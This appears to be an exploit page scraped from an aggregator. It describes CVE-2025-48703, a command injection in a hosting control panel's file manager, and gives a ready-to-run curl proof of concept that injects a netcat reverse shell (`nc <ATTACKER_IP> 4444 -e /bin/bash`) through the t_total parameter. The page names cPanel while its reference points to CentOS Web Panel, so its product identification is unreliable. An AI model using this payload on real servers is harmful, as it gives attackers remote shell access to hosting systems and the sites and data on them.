## https://sploitus.com/exploit?id=948E719F-C0C9-518E-969F-C65D0D6FBE65
# ๐ก๏ธ CVE-2025-48703 - Remote Code Execution (RCE) in cPanel File Manager
## ๐ Description
**CVE-2025-48703** is a Remote Code Execution (RCE) vulnerability in the `filemanager` module of a web hosting control panel (e.g., cPanel). It occurs due to **unsanitized input handling** in the `acc=changePerm` function, which allows an attacker to inject and execute arbitrary system commands using the `t_total` parameter.
---
## ๐งจ Impact
This vulnerability allows attackers to:
- Execute arbitrary commands on the target server.
- Establish a reverse shell for persistent access.
- Potentially escalate privileges or move laterally.
> โ ๏ธ This attack can be performed with minimal authentication, or in some configurations, unauthenticated access.
---
## ๐ Proof-of-Concept (PoC)
### โ Reverse Shell Command
```bash
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
```
References: https://fenrisk.com/rce-centos-webpanel